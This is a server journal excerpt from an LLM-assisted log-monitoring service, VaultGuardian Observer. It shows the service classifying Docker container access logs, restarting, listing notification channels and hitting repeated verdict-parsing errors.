Mar 19 22:41:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:51.907992 [analyzer] Source hint mismatch: LLM says "docker container access logger (HTTP API)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:41:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:54.830939 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix
Mar 19 22:41:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:54.830979 [analyzer] Source hint mismatch: LLM says "docker (captain-captain container) / web app access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:41:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:57.588206 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix
Mar 19 22:41:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:57.588237 [analyzer] Source hint mismatch: LLM says "docker (containerized web/app logs via access logger)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:42:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:00.744485 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:42:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:00.744522 [analyzer] Source hint mismatch: LLM says "docker container reverse-proxy / application HTTP server (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:42:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:03.799777 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:42:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:03.799816 [analyzer] Source hint mismatch: LLM says "docker containerized web API (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:42:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:06.164383 [observer] Pipeline: processed=863 pattern_hits=473 llm_calls=389 llm_errors=6 learned=1
Mar 19 22:42:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:06.164422 [observer] Patterns: hash=473 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=1 misses=390
Mar 19 22:42:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:06.790206 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:42:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:06.790241 [analyzer] Source hint mismatch: LLM says "docker container web/api access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:42:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:09.812584 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:42:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:09.812624 [analyzer] Source hint mismatch: LLM says "docker/captain (web service proxy or app request logger)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:42:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:12.730054 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:42:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:12.730102 [analyzer] Source hint mismatch: LLM says "docker http access logger (app API)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:42:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:15.709928 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:42:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:15.709964 [analyzer] Source hint mismatch: LLM says "docker container web/app access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:42:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:21.986911 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix
Mar 19 22:42:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:21.986957 [analyzer] Source hint mismatch: LLM says "docker container access log (web service)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:42:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:24.527332 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:42:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:24.527365 [analyzer] Source hint mismatch: LLM says "docker/captain (likely container access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:42:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:25.668153 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=contains
Mar 19 22:42:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:25.668216 [analyzer] Source hint mismatch: LLM says "docker (app access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:42:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:27.750205 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix
Mar 19 22:42:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:27.750246 [analyzer] Source hint mismatch: LLM says "docker/container web API access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:42:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:30.741519 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.80 action=allow pattern_type=prefix
Mar 19 22:42:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:30.741555 [analyzer] Source hint mismatch: LLM says "docker container (captain-captain) HTTP access logging", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:42:31 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:31.452951 [observer] Shutting down...
Mar 19 22:42:31 ip-172-26-12-110 systemd[1]: Stopping VaultGuardian Observer...
Mar 19 22:42:31 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:31.458451 [observer] Final stats: processed=885 pattern_hits=487 llm_calls=397 learned=1
Mar 19 22:42:31 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:31.458474 [observer] Shutdown complete
Mar 19 22:42:31 ip-172-26-12-110 systemd[1]: observer.service: Deactivated successfully.
Mar 19 22:42:31 ip-172-26-12-110 systemd[1]: Stopped VaultGuardian Observer.
Mar 19 22:42:31 ip-172-26-12-110 systemd[1]: Started VaultGuardian Observer.
Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.472637 [observer] VaultGuardian Observer starting...
Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.472986 [observer] Normalizer registry initialized
Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.477008 [observer] Pattern store initialized (4 scopes)
Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.477028 [observer] Analyzer pipeline ready
Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.477125 [notifier] Generated default config at /var/lib/observer/notifications.yaml
Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.477393 [logwatch] Notifications:
Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.477405 [logwatch]   ✗ webhook    → not configured (set WEBHOOK_URL)
Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.477410 [logwatch]   ✗ email      → not configured (set RESEND_API_KEY + ALERT_EMAIL_TO)
Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.477414 [logwatch]   ✗ sms        → not configured (set TWILIO_SID + ALERT_SMS_TO)
Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.477417 [logwatch]   ✗ push/ios   → not configured (set APNS_KEY_PATH + APNS_DEVICE_TOKEN)
Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.477420 [logwatch]   ✗ push/fcm   → not configured (set FCM_CREDENTIALS_PATH + FCM_DEVICE_TOKEN)
Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.477423 [observer] No notification channels configured — alerts will be logged to stdout only
Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.477697 [observer] Starting container log watcher...
Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.482373 [watcher] Found 8 running containers
Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.482403 [watcher] Streaming logs for srv-captain--login.1.z0hqzqv52lp5zsxguujh9vvsp (0fd7725d4d5c)
Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.482540 [watcher] Streaming logs for srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp (e9fbb6ab33ae)
Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.482609 [watcher] Streaming logs for captain-certbot.1.by454lfepw5mkzfa8e3karl8p (e1aa25883517)
Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.482612 [watcher] Streaming logs for captain-netdata-container (974270844dff)
Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.482687 [watcher] Streaming logs for captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo (9d722e5b66d0)
Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.482771 [watcher] Streaming logs for srv-captain--media-api.1.8iw1rx1hsebohsltxip133ftf (73fec0bbd4c4)
Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.482784 [watcher] Streaming logs for captain-captain.1.oqvny8g95v3neveijmxdmdgto (080568bcaf31)
Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.482863 [watcher] Streaming logs for srv-captain--media.1.td1ofal2g3beoqwzjiemvmuo4 (91c0395873e8)
Mar 19 22:42:32 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:32.060530 [observer] LLM inference server connected
Mar 19 22:42:33 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:33.993214 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:42:33 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:33.993261 [analyzer] Source hint mismatch: LLM says "dockerized web/app access logger", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:42:36 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:36.749600 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.82 action=allow pattern_type=prefix
Mar 19 22:42:36 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:36.749640 [analyzer] Confidence 0.82 too low for pattern learning (need 0.85+)
Mar 19 22:42:42 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:42.854316 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:42:42 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:42.854351 [analyzer] Confidence 0.72 too low for pattern learning (need 0.85+)
Mar 19 22:42:45 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:45.894521 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.42 action=suppress pattern_type=prefix
Mar 19 22:42:45 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:45.894557 [analyzer] Confidence 0.42 too low for pattern learning (need 0.85+)
Mar 19 22:42:48 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:48.758768 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.70 action=allow pattern_type=prefix
Mar 19 22:42:48 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:48.758801 [analyzer] Source hint mismatch: LLM says "docker (containerized web/API service access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:42:51 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:51.922852 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.76 action=allow pattern_type=prefix
Mar 19 22:42:51 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:51.922887 [analyzer] Source hint mismatch: LLM says "docker (application HTTP access log for logs endpoint)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:42:54 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:54.742643 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:42:54 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:54.742680 [analyzer] Confidence 0.78 too low for pattern learning (need 0.85+)
Mar 19 22:42:58 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:58.013847 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix
Mar 19 22:42:58 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:58.013882 [analyzer] Learned prefix pattern for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto [allow]: "GET /api/v2/user/apps/appData/api/logs?encoding=hex"
Mar 19 22:43:00 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:43:00.880840 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:43:00 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:43:00.880877 [analyzer] Source hint mismatch: LLM says "docker container access logger / app HTTP server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:43:01 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:43:01.489252 [observer] Pipeline: processed=22 pattern_hits=13 llm_calls=9 llm_errors=0 learned=1
Mar 19 22:43:01 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:43:01.489277 [observer] Patterns: hash=13 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=9
Mar 19 22:43:03 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:43:03.821515 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.62 action=suppress pattern_type=prefix
Mar 19 22:43:03 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:43:03.821550 [analyzer] Source hint mismatch: LLM says "docker/container web access logger", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:43:06 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:43:06.865481 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.62 action=suppress pattern_type=prefix
Mar 19 22:43:06 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:43:06.865523 [analyzer] Source hint mismatch: LLM says "docker container access log / web API", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:43:09 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:43:09.684813 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=contains
Mar 19 22:43:09 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:43:09.684853 [analyzer] Confidence 0.78 too low for pattern learning (need 0.85+)
Mar 19 22:43:12 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:43:12.748517 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:43:12 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:43:12.748556 [analyzer] Source hint mismatch: LLM says "docker (container web/app proxy access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:43:15 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:43:15.159381 [observer] Shutting down...
Mar 19 22:43:15 ip-172-26-12-110 systemd[1]: Stopping VaultGuardian Observer...
Mar 19 22:43:15 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:43:15.166537 [observer] Final stats: processed=34 pattern_hits=21 llm_calls=13 learned=1
Mar 19 22:43:15 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:43:15.166562 [observer] Shutdown complete
Mar 19 22:43:15 ip-172-26-12-110 systemd[1]: observer.service: Deactivated successfully.
Mar 19 22:43:15 ip-172-26-12-110 systemd[1]: Stopped VaultGuardian Observer.
Mar 19 22:43:15 ip-172-26-12-110 systemd[1]: Started VaultGuardian Observer.
Mar 19 22:43:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:15.182055 [observer] VaultGuardian Observer starting...
Mar 19 22:43:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:15.182099 [observer] Normalizer registry initialized
Mar 19 22:43:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:15.187264 [observer] Pattern store initialized (4 scopes)
Mar 19 22:43:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:15.187283 [observer] Analyzer pipeline ready
Mar 19 22:43:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:15.187512 [logwatch] Notifications:
Mar 19 22:43:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:15.187519 [logwatch]   ✗ webhook    → not configured (set WEBHOOK_URL)
Mar 19 22:43:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:15.187524 [logwatch]   ✓ email      → drew@vaultdec.com
Mar 19 22:43:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:15.187528 [logwatch]   ✗ sms        → not configured (set TWILIO_SID + ALERT_SMS_TO)
Mar 19 22:43:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:15.187531 [logwatch]   ✗ push/ios   → not configured (set APNS_KEY_PATH + APNS_DEVICE_TOKEN)
Mar 19 22:43:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:15.187534 [logwatch]   ✗ push/fcm   → not configured (set FCM_CREDENTIALS_PATH + FCM_DEVICE_TOKEN)
Mar 19 22:43:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:15.187690 [observer] Starting container log watcher...
Mar 19 22:43:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:15.192499 [watcher] Found 8 running containers
Mar 19 22:43:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:15.192636 [watcher] Streaming logs for srv-captain--login.1.z0hqzqv52lp5zsxguujh9vvsp (0fd7725d4d5c)
Mar 19 22:43:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:15.192880 [watcher] Streaming logs for srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp (e9fbb6ab33ae)
Mar 19 22:43:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:15.192957 [watcher] Streaming logs for captain-certbot.1.by454lfepw5mkzfa8e3karl8p (e1aa25883517)
Mar 19 22:43:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:15.193069 [watcher] Streaming logs for captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo (9d722e5b66d0)
Mar 19 22:43:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:15.193143 [watcher] Streaming logs for srv-captain--media-api.1.8iw1rx1hsebohsltxip133ftf (73fec0bbd4c4)
Mar 19 22:43:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:15.193233 [watcher] Streaming logs for captain-captain.1.oqvny8g95v3neveijmxdmdgto (080568bcaf31)
Mar 19 22:43:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:15.193302 [watcher] Streaming logs for srv-captain--media.1.td1ofal2g3beoqwzjiemvmuo4 (91c0395873e8)
Mar 19 22:43:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:15.193429 [watcher] Streaming logs for captain-netdata-container (974270844dff)
Mar 19 22:43:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:15.692864 [observer] LLM inference server connected
Mar 19 22:43:27 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:27.410515 [llm] Failed to parse verdict from:
Mar 19 22:43:27 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:27.410565 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:43:27 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:27.410577 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:43:17.596618845Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:43:36 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:36.468587 [llm] Failed to parse verdict from:
Mar 19 22:43:36 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:36.468624 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:43:36 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:36.468633 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:43:20.610612677Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:43:45 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:45.192573 [observer] Pipeline: processed=16 pattern_hits=13 llm_calls=3 llm_errors=2 learned=0
Mar 19 22:43:45 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:45.192600 [observer] Patterns: hash=13 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=3
Mar 19 22:43:50 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:50.092315 [llm] Failed to parse verdict from:
Mar 19 22:43:50 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:50.092354 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:43:50 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:50.092363 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:43:23.584043667Z GET /api/v2/user/apps/appData/api 304 2.453 ms - -
Mar 19 22:43:59 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:59.489215 [llm] Failed to parse verdict from:
Mar 19 22:43:59 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:59.489248 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:43:59 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:59.489258 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:43:23.605803170Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:44:09 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:09.102136 [llm] Failed to parse verdict from:
Mar 19 22:44:09 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:09.102210 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:44:09 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:09.102220 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:43:29.596302892Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:44:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:15.192314 [observer] Pipeline: processed=33 pattern_hits=27 llm_calls=6 llm_errors=5 learned=0
Mar 19 22:44:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:15.192338 [observer] Patterns: hash=27 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=6
Mar 19 22:44:18 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:18.695866 [llm] Failed to parse verdict from:
Mar 19 22:44:18 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:18.695903 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:44:18 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:18.695911 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:43:32.596792617Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:44:27 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:27.129215 [llm] Failed to parse verdict from:
Mar 19 22:44:27 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:27.129252 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:44:27 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:27.129262 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:43:35.600308545Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:44:34 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:34.983567 [llm] Failed to parse verdict from:
Mar 19 22:44:34 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:34.983599 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 22:44:34 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:34.983606 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:44:24.868600818Z 205.210.31.27 - - [19/Mar/2026:22:44:24 +0000] "54.200.221.0" "GET / ...
Mar 19 22:44:38 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:38.304024 [llm] Failed to parse verdict from:
Mar 19 22:44:38 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:38.304060 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:44:38 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:38.304069 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:43:38.597970848Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:44:45 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:45.193923 [observer] Pipeline: processed=53 pattern_hits=40 llm_calls=11 llm_errors=9 learned=0
Mar 19 22:44:45 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:45.193949 [observer] Patterns: hash=40 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=13
Mar 19 22:44:47 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:47.047626 [llm] Failed to parse verdict from:
Mar 19 22:44:47 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:47.047672 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:44:47 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:47.047682 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:43:44.603607287Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:44:48 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:48.647810 [llm] Failed to parse verdict from:
Mar 19 22:44:48 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:48.647861 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
